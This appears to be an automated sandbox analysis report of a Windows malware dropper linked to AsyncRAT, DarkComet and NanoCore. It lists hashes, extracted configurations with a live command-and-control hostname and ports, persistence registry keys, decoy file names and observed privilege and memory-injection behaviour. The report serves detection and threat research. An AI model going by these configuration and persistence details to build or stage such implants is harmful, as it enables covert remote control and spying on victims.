asyncrat | 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236

Analysis

max time kernel
23s
max time network
151s
platform
windows11-21h2_x64
resource
win11-20250410-en
resource tags

arch:x64arch:x86image:win11-20250410-enlocale:en-usos:windows11-21h2-x64system
submitted
21/04/2025, 19:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe
Size

1018KB
MD5

eceb6e1e8aa84e6501589dc1d3deb419
SHA1

467a412530d7af26b01ec278d7d325e4b6dd047a
SHA256

9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236
SHA512

be256564941a092d73b6931dfa0a238b17d68c69e1742b98844e43fa3010db83bf9d52922912e127cd9b6cd1bbf9ecd39c4a36c2da676ca060bf21ffef8b27bf
SSDEEP

24576:pji1+TKiRzC0NqgGApfkxIpePcvkTR8cvkTAU:pu1+miRnQjALpe0vkTNvkTN

Score

10^/10

asyncrat darkcomet nanocore default guest16 defense_evasion discovery execution keylogger persistence rat spyware stealer trojan upx

Malware Config

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

jvjv2044duck33.duckdns.org:8808

Mutex

0fC8zJGwBBNm

Attributes

delay
3
install
true
install_file
csrss.exe
install_folder
%AppData%

aes.plain

Extracted

Family

darkcomet

Botnet

Guest16

jvjv2044duck33.duckdns.org:1604

Mutex

DC_MUTEX-CK7UE3N

Attributes

InstallPath
MSDCSC\msdcsc.exe
gencode
Jp74nsvbhc4i
install
true
offline_keylogger
true
persistence
true
reg_key
MicroUpdate

rc4.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat
Darkcomet
DarkComet is a remote access trojan (RAT) developed by Jean-Pierre Lesueur.
trojan rat darkcomet
Darkcomet family
darkcomet

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit = "C:\\Windows\\system32\\userinit.exe,C:\\Users\\Admin\\Documents\\MSDCSC\\msdcsc.exe"	VLC1.EXE

NanoCore
NanoCore is a remote access tool (RAT) with a variety of capabilities.
keylogger trojan stealer spyware nanocore
Nanocore family
nanocore

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral2/files/0x001900000002b112-85.dat	family_asyncrat

Disables Task Manager via registry modification
defense_evasion

Sets file to hidden 1 TTPs 5 IoCs

Modifies file attributes to stop it showing in Explorer etc.

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
1720	attrib.exe
5528	attrib.exe
5668	attrib.exe
3584	attrib.exe
4048	attrib.exe

Executes dropped EXE 64 IoCs

pid	Process
2288	FILE5.EXE
5908	JOKE.EXE
1056	JOKE2.EXE
4364	LEGIT_SOFTWARE1.EXE
5108	ULTIME MULTIHACK REBORN.EXE
1900	VLC1.EXE
4700	LEGIT_SOFTWARE2.EXE
5828	WINDOWS SECURITY NANO.EXE
4728	WINDOWS DEFENDER.EXE
4980	SENDE2R.EXE
2676	Rundll32.exe
5688	Rundll32.exe
3504	msdcsc.exe
4416	Rundll32.exe
3004	msdcsc.exe
2276	Rundll32.exe
2988	msdcsc.exe
1708	Rundll32.exe
2148	Rundll32.exe
5268	Rundll32.exe
4752	Rundll32.exe
1720	Rundll32.exe
2116	Rundll32.exe
1520	Rundll32.exe
2788	Rundll32.exe
848	Rundll32.exe
5608	Rundll32.exe
2468	Rundll32.exe
2632	Rundll32.exe
2336	Rundll32.exe
4100	Rundll32.exe
5256	Rundll32.exe
5584	Rundll32.exe
4244	Rundll32.exe
560	Rundll32.exe
4676	Rundll32.exe
3028	Rundll32.exe
1628	Rundll32.exe
2352	Rundll32.exe
1764	Rundll32.exe
5216	Rundll32.exe
4516	Rundll32.exe
5656	Rundll32.exe
1100	Rundll32.exe
1292	Rundll32.exe
4508	Rundll32.exe
3348	Rundll32.exe
2600	csrss.exe
2744	Rundll32.exe
4944	Rundll32.exe
2628	Rundll32.exe
5692	Rundll32.exe
5052	Rundll32.exe
3480	Rundll32.exe
2988	msdcsc.exe
4144	Rundll32.exe
1104	Rundll32.exe
2676	Rundll32.exe
848	Rundll32.exe
5904	Rundll32.exe
4968	Rundll32.exe
2120	Rundll32.exe
5776	Rundll32.exe
2404	Rundll32.exe

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4239789418-2672923313-1754393631-1000\Software\Microsoft\Windows\CurrentVersion\Run\FindMe = "C:\\Windows\\Temp\\svchost_533423.exe"	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4239789418-2672923313-1754393631-1000\Software\Microsoft\Windows\CurrentVersion\Run\FindMe = "C:\\Users\\Public\\Documents\\winservice_533423.exe"	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4239789418-2672923313-1754393631-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicroUpdate = "C:\\Users\\Admin\\Documents\\MSDCSC\\msdcsc.exe"	VLC1.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\UPNP Host = "C:\\Program Files (x86)\\UPNP Host\\upnphost.exe"	WINDOWS SECURITY NANO.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4239789418-2672923313-1754393631-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicroUpdate = "C:\\Users\\Admin\\Documents\\MSDCSC\\msdcsc.exe"	msdcsc.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

defense_evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	WINDOWS SECURITY NANO.EXE

Drops file in System32 directory 64 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe
File created	C:\Windows\SysWOW64\config\Rundll32.exe	Rundll32.exe

UPX packed file 11 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1900-95-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral2/files/0x001900000002b110-90.dat	upx
behavioral2/memory/3504-216-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral2/memory/3004-274-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral2/memory/3004-280-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral2/memory/2988-289-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral2/memory/1900-286-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral2/memory/2988-296-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral2/memory/3504-317-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral2/memory/2988-446-0x0000000000400000-0x00000000004B7000-memory.dmp	upx
behavioral2/memory/2988-448-0x0000000000400000-0x00000000004B7000-memory.dmp	upx

Drops file in Program Files directory 7 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\VLC1.EXE	attrib.exe
File created	C:\Program Files (x86)\ULTIME MULTIHACK REBORN.EXE	FILE5.EXE
File created	C:\Program Files (x86)\VLC1.EXE	FILE5.EXE
File created	C:\Program Files (x86)\WINDOWS DEFENDER.EXE	FILE5.EXE
File created	C:\Program Files (x86)\WINDOWS SECURITY NANO.EXE	FILE5.EXE
File created	C:\Program Files (x86)\UPNP Host\upnphost.exe	WINDOWS SECURITY NANO.EXE
File opened for modification	C:\Program Files (x86)\UPNP Host\upnphost.exe	WINDOWS SECURITY NANO.EXE

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5236	powershell.exe
2952	powershell.exe
4816	powershell.exe
3576	powershell.exe
2536	powershell.exe
1104	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	LEGIT_SOFTWARE2.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FILE5.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	JOKE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	LEGIT_SOFTWARE1.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rundll32.exe

Delays execution with timeout.exe 10 IoCs

defense_evasion

pid	Process
1532	timeout.exe
1800	timeout.exe
4504	timeout.exe
5756	timeout.exe
4432	timeout.exe
5512	timeout.exe
2700	timeout.exe
5212	timeout.exe
412	timeout.exe
2896	timeout.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4239789418-2672923313-1754393631-1000\Software\Microsoft\Internet Explorer\Main	reg.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4239789418-2672923313-1754393631-1000_Classes\Local Settings	9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	VLC1.EXE
Key created	\REGISTRY\USER\S-1-5-21-4239789418-2672923313-1754393631-1000_Classes\Local Settings	cmd.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
4612	reg.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1628	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5828	WINDOWS SECURITY NANO.EXE
5828	WINDOWS SECURITY NANO.EXE
5828	WINDOWS SECURITY NANO.EXE
5828	WINDOWS SECURITY NANO.EXE
3576	powershell.exe
3576	powershell.exe
4816	powershell.exe
4816	powershell.exe
2536	powershell.exe
2536	powershell.exe
2952	powershell.exe
2952	powershell.exe
1104	powershell.exe
1104	powershell.exe
5108	ULTIME MULTIHACK REBORN.EXE
5108	ULTIME MULTIHACK REBORN.EXE
5108	ULTIME MULTIHACK REBORN.EXE
5828	WINDOWS SECURITY NANO.EXE
5828	WINDOWS SECURITY NANO.EXE
5828	WINDOWS SECURITY NANO.EXE
5828	WINDOWS SECURITY NANO.EXE
5108	ULTIME MULTIHACK REBORN.EXE
5108	ULTIME MULTIHACK REBORN.EXE
5108	ULTIME MULTIHACK REBORN.EXE
5236	powershell.exe
5236	powershell.exe
5108	ULTIME MULTIHACK REBORN.EXE
5108	ULTIME MULTIHACK REBORN.EXE
5108	ULTIME MULTIHACK REBORN.EXE
5108	ULTIME MULTIHACK REBORN.EXE
5108	ULTIME MULTIHACK REBORN.EXE
3576	powershell.exe
3576	powershell.exe
1104	powershell.exe
5108	ULTIME MULTIHACK REBORN.EXE
5108	ULTIME MULTIHACK REBORN.EXE
5108	ULTIME MULTIHACK REBORN.EXE
5108	ULTIME MULTIHACK REBORN.EXE
2952	powershell.exe
4816	powershell.exe
5108	ULTIME MULTIHACK REBORN.EXE
5108	ULTIME MULTIHACK REBORN.EXE
5108	ULTIME MULTIHACK REBORN.EXE
5108	ULTIME MULTIHACK REBORN.EXE
5108	ULTIME MULTIHACK REBORN.EXE
5108	ULTIME MULTIHACK REBORN.EXE
5108	ULTIME MULTIHACK REBORN.EXE
5236	powershell.exe
2536	powershell.exe
5108	ULTIME MULTIHACK REBORN.EXE
5108	ULTIME MULTIHACK REBORN.EXE
5108	ULTIME MULTIHACK REBORN.EXE
5108	ULTIME MULTIHACK REBORN.EXE
4728	WINDOWS DEFENDER.EXE
4728	WINDOWS DEFENDER.EXE
4728	WINDOWS DEFENDER.EXE
4728	WINDOWS DEFENDER.EXE
4728	WINDOWS DEFENDER.EXE
4728	WINDOWS DEFENDER.EXE
4728	WINDOWS DEFENDER.EXE
4728	WINDOWS DEFENDER.EXE
4728	WINDOWS DEFENDER.EXE
4728	WINDOWS DEFENDER.EXE
4728	WINDOWS DEFENDER.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
5828	WINDOWS SECURITY NANO.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	1900	VLC1.EXE
Token: SeSecurityPrivilege	1900	VLC1.EXE
Token: SeTakeOwnershipPrivilege	1900	VLC1.EXE
Token: SeLoadDriverPrivilege	1900	VLC1.EXE
Token: SeSystemProfilePrivilege	1900	VLC1.EXE
Token: SeSystemtimePrivilege	1900	VLC1.EXE
Token: SeProfSingleProcessPrivilege	1900	VLC1.EXE
Token: SeIncBasePriorityPrivilege	1900	VLC1.EXE
Token: SeCreatePagefilePrivilege	1900	VLC1.EXE
Token: SeBackupPrivilege	1900	VLC1.EXE
Token: SeRestorePrivilege	1900	VLC1.EXE
Token: SeShutdownPrivilege	1900	VLC1.EXE
Token: SeDebugPrivilege	1900	VLC1.EXE
Token: SeSystemEnvironmentPrivilege	1900	VLC1.EXE
Token: SeChangeNotifyPrivilege	1900	VLC1.EXE
Token: SeRemoteShutdownPrivilege	1900	VLC1.EXE
Token: SeUndockPrivilege	1900	VLC1.EXE
Token: SeManageVolumePrivilege	1900	VLC1.EXE
Token: SeImpersonatePrivilege	1900	VLC1.EXE
Token: SeCreateGlobalPrivilege	1900	VLC1.EXE
Token: 33	1900	VLC1.EXE
Token: 34	1900	VLC1.EXE
Token: 35	1900	VLC1.EXE
Token: 36	1900	VLC1.EXE
Token: SeDebugPrivilege	5828	WINDOWS SECURITY NANO.EXE
Token: SeDebugPrivilege	4816	powershell.exe
Token: SeDebugPrivilege	2952	powershell.exe
Token: SeDebugPrivilege	3576	powershell.exe
Token: SeDebugPrivilege	2536	powershell.exe
Token: SeIncreaseQuotaPrivilege	3504	msdcsc.exe
Token: SeSecurityPrivilege	3504	msdcsc.exe
Token: SeTakeOwnershipPrivilege	3504	msdcsc.exe
Token: SeLoadDriverPrivilege	3504	msdcsc.exe
Token: SeSystemProfilePrivilege	3504	msdcsc.exe
Token: SeSystemtimePrivilege	3504	msdcsc.exe
Token: SeProfSingleProcessPrivilege	3504	msdcsc.exe
Token: SeIncBasePriorityPrivilege	3504	msdcsc.exe
Token: SeCreatePagefilePrivilege	3504	msdcsc.exe
Token: SeBackupPrivilege	3504	msdcsc.exe
Token: SeRestorePrivilege	3504	msdcsc.exe
Token: SeShutdownPrivilege	3504	msdcsc.exe
Token: SeDebugPrivilege	3504	msdcsc.exe
Token: SeSystemEnvironmentPrivilege	3504	msdcsc.exe
Token: SeChangeNotifyPrivilege	3504	msdcsc.exe
Token: SeRemoteShutdownPrivilege	3504	msdcsc.exe
Token: SeUndockPrivilege	3504	msdcsc.exe
Token: SeManageVolumePrivilege	3504	msdcsc.exe
Token: SeImpersonatePrivilege	3504	msdcsc.exe
Token: SeCreateGlobalPrivilege	3504	msdcsc.exe
Token: 33	3504	msdcsc.exe
Token: 34	3504	msdcsc.exe
Token: 35	3504	msdcsc.exe
Token: 36	3504	msdcsc.exe
Token: SeDebugPrivilege	1104	powershell.exe
Token: SeDebugPrivilege	5108	ULTIME MULTIHACK REBORN.EXE
Token: SeDebugPrivilege	5236	powershell.exe
Token: SeIncreaseQuotaPrivilege	3004	msdcsc.exe
Token: SeSecurityPrivilege	3004	msdcsc.exe
Token: SeTakeOwnershipPrivilege	3004	msdcsc.exe
Token: SeLoadDriverPrivilege	3004	msdcsc.exe
Token: SeSystemProfilePrivilege	3004	msdcsc.exe
Token: SeSystemtimePrivilege	3004	msdcsc.exe
Token: SeProfSingleProcessPrivilege	3004	msdcsc.exe
Token: SeIncBasePriorityPrivilege	3004	msdcsc.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
5908	JOKE.EXE
1056	JOKE2.EXE
3504	msdcsc.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3376 wrote to memory of 1872	3376	9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe	78
PID 3376 wrote to memory of 1872	3376	9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe	78
PID 3376 wrote to memory of 1872	3376	9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe	78
PID 3376 wrote to memory of 2288	3376	9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe	79
PID 3376 wrote to memory of 2288	3376	9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe	79
PID 3376 wrote to memory of 2288	3376	9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe	79
PID 3376 wrote to memory of 4268	3376	9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe	80
PID 3376 wrote to memory of 4268	3376	9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe	80
PID 3376 wrote to memory of 4268	3376	9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe	80
PID 3376 wrote to memory of 5924	3376	9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe	81
PID 3376 wrote to memory of 5924	3376	9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe	81
PID 3376 wrote to memory of 5924	3376	9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe	81
PID 3376 wrote to memory of 5908	3376	9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe	82
PID 3376 wrote to memory of 5908	3376	9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe	82
PID 3376 wrote to memory of 5908	3376	9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe	82
PID 3376 wrote to memory of 1056	3376	9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe	83
PID 3376 wrote to memory of 1056	3376	9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe	83
PID 3376 wrote to memory of 1056	3376	9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe	83
PID 2288 wrote to memory of 5108	2288	FILE5.EXE	84
PID 2288 wrote to memory of 5108	2288	FILE5.EXE	84
PID 2288 wrote to memory of 5108	2288	FILE5.EXE	84
